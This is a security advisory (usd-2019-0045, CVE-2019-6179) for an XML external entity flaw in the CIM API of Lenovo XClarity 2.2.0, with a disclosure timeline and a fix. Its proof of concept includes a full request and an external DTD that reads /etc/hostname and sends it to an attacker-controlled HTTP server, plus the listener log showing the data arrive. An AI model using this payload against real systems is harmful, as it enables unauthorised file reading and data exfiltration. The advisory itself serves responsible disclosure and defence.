usd-2019-0045 | XClarity 2.2.0

Advisory ID: usd-2019-0045
CVE Number: CVE-2019-6179
Affected Product: XClarity
Affected Version: 2.2.0
Vulnerability Type: XML External Entity Processing
Security Risk: Critical
Vendor URL: https://www.lenovo.com/
Vendor Status: Fixed
Vendor Advisory : https://support.lenovo.com/de/de/solutions/len-27805

Description

The Appliance has a CIM API listening on port 9090 that is vulnerable to XXE.

Proof of Concept (PoC)

Request:

POST /cimom HTTP/1.1 
Host: 10.10.10.4:9090 
Accept-Encoding: gzip, deflate 
Content-type: application/xml; charset="utf-8" 
Content-Length: 503 
CIMOperation: MethodCall 
CIMObject: root/cimv2 
Connection: close 

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE CIM [
<!ELEMENT CIM ANY >
<!ENTITY % sp SYSTEM "http://10.10.80.241/test.xml">
%sp;
%param1;
]>
<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1001" PROTOCOLVERSION="1.0"><SIMPLEREQ>&exfil;<IMETHODCALL NAME="EnumerateInstances"><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH><IPARAMVALUE NAME="ClassName"><CLASSNAME NAME="CIM_ComputerSystem"/></IPARAMVALUE></IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>

Response:

HTTP/1.1 400 Bad Request
Content-Type: application/xml;charset="utf-8"
Content-length: 0
Connection: close

Meanwhile on the nc listener:

pentester:~/www$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.32 - - [24/May/2019 15:27:00] "GET /test.xml HTTP/1.0" 200 -
10.10.10.32 - - [24/May/2019 15:27:00] "GET /?localhost HTTP/1.0" 200  -

Content of test.xml:

<!ENTITY % data SYSTEM "file:///etc/hostname"> 
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.241/?%data;'>">

Fix

Disable external entity processing in the XML parser if possible or limit accessibility of the API to authenticated users.

Timeline

  • 2019-05-27 First contact request via psirt@lenovo.com
  • 2019-09-03 Lenovo Discloses Advisory at https://support.lenovo.com/de/de/solutions/len-27805
  • 2019-10-21 First Published

Credits

This security vulnerabilities was found by Tobias Neitzel of usd AG.

ABOUT usd SECURITY ADVISORIES

In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: „more security.“

to usd AG


In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.

Disclaimer

The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.